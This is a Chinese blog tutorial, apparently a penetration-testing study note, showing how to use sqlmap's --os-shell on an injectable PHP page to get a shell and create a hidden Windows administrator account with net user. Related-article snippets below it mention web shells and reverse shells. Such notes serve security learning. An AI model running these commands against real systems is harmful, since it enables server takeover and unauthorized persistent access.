Kali渗透学习(2)——sqlmap使用--os-shell添加管理员

最新推荐文章于 2025-04-15 11:27:01 发布
最新推荐文章于 2025-04-15 11:27:01 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: 渗透测试 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43669969/article/details/104392142
版权

Kali渗透学习(2)——sqlmap使用–os-shell添加管理员

首先要使用 --os-shell 来添加管理员用户,数据库要满足以下条件

1.你使用的数据库要有root权限

sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --is-dbs

2GPC处于关闭状态即magic_quotes_gpc = off,php主动转义的功能关闭

可以通过探针,或者测试特殊字符来确定是否关闭

3.secure_file_priv为空

使用sqlmap --os-shell

sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --os-shell

返回**os-shell>**表示成功了,这里列出了常用提权dos命令

列出用户 net user
添加用户 net user username password /add 注意密码至少包含一个符号
添加至管理员组 net localgroup administrators username

使用远程桌面链接

rdesktop ip:port

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 4875
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
sqlmap (--os-shell)使用
m0_55628907的博客
09-06 360
1. 可通过抓包,输入不合法的字符让页面回显出根路径如:c:\appserv\www\phptest2\db_func.php我们需要猜测根目录是在 c:\appserv\www\phptest2\ 还是在 c:\appserv\www\
渗透测试之SQLMAP工具详解,kali自带SQLmap解释 重点sqlmap --tamper 使用方式详解 搞完你就很nice了
最新发布
qq_41314882的博客
04-15 890
Sqlmap是一个开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程他有一个强大的检测引擎许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令使用它的时候可以设置很多的参数,注意这些参数,面试经常问到sqlmap很强大,以后测试某个网址是否存在注入点的时候就不需要自己写注入的sql语句了手工的就记住几个简单的比如单引号、and、or等等。
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1538
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap--os-shell
m0_71300782的博客
09-06 1149
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
sqlmap--os-shell)的使用
weixin_45815516的博客
01-01 590
以pikachu靶场字符型sql注入为例演示sqlmap中的--os-shell的用法
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3323
学习sqlmap自动注入
渗透测试工具使用——sqlmap
qq_53633989的博客
05-08 435
sqlmap支持五种不同的注入模式:l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;l 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;l 联合查询注入,可以使用union的情况下的注入;l 堆查询注入,可以同时执行多条语句的执行时的注入。
vulnhub——Ai-Web1靶机渗透
qq_63034068的博客
07-20 1136
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段。sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表。我们再去扫一下另一个路径,我们看到了一个php文件。
kali】34 WEB渗透——扫描工具w3af_console
(∪.∪ )...zzz的博客
12-07 6436
这里写自定义目录标题一、简介1.plugin2. kali 安装w3af[问题解决]二、 操作1. 启动帮助2.plugins模块开启三个插件模块扫描所有插件模块3. profiles 模块4.http-settings 模块5.misc-settings (杂项设置)模块6.target 模块7.启动8.脚本 w3af_console 一、简介 web扫描框架(开源、不断添加 集成exploit模块 1.plugin audit(审计):该类插件会向Crawl插件爬取出的注入点发送特制的POC数据以
Kali Linux添加、切换用户
热门推荐
HAPPY
08-14 3万+
1.打开终端,输入  useradd -m username  (将username换成你想要的用户名) 2.更改密码: 在终端输入 passwd username (需要输入两次)       3.将我们创建的用户添加到sudo用户组。(这样我们创建的用户才能进行安装软件,允许打印。使用特权模式等操作。不然我们创建的用户就只能进行浏览。没有实际意义) 输入:usermod -a -G s...
Kali添加普通用户
The code way of kinnisoy
04-18 6087
刚装好的kali用户名默认是 root,密码是安装过程中自己设置的。 进去之后发现 #whoami之后,默认直接是root权限,想要添加一个普通用户怎么办呢? 使用命令: useradd -m [user_name] #添加新用户 passwd [user_name] #新用户设置密码 在普通用户和管理员之间切换可以使用命令: su [user_name] #切换...
Kali与编程:解决客户端无法正确加入域,以及如何将客户端加入域
Kali与编程
07-05 659
实验说明:本章节将教大家如何解决从域服务器端克隆出的虚拟机作为客户端却无法正确加入域的问题。 实验环境:安装一台windows server2019并在关机状态下新建快照,再克隆一台作为客户端。 服务器端ip地址:192.168.159.129 dns地址:192.168.159.129 客户端ip地址:192.168.159.132 dns地址:192.168.159.129 (根据实际网卡获取地址) 进行实验 在vmware软件上找到安装好的server2019 右击打开选项卡,点击“管理”工具 .
网络安全与网站安全及计算机安全:如何使用Kali Linux获取Windows计算机操作系统管理员权限【维持】
Kali与编程
12-14 5956
一、背景介绍 Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习! 二、资源装备 1.成功拿下的 Win7虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、安全演练 3.
sqlmap mysql root权限 执行命令_实例sqlmap进行mysql注入root权限读写文件
weixin_42311115的博客
02-01 900
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库返回结果 :[02:42:20] [INFO] fetching current user current us...
python应用-os模块shell命令和进程/环境变量功能介绍
kymppcds的博客
04-19 506
python自带的os模块提供了许多与操作系统交互的函数,适配多种操作系统,比如windows,mac,linux等,比如常用路径操作、进程管理、环境参数等都可通过os模块实现。之前介绍了os模块操作目录和os.path操作路径的一些常用功能,下面介绍下其他的一些功能。
sqlmap工具使用
huangyongkang666的博客
03-21 4190
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
Termux环境下的Kali-Chroot引导工具:boot-nethunter
- **kali-linux**: 是一个专门用于数字取证和渗透测试的Linux发行版,包含了大量的安全和取证工具。 - **nethunter**: 是一个集成到Kali Linux中的渗透测试平台,提供了包括安全审计、无线攻击、密码破解等在内的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值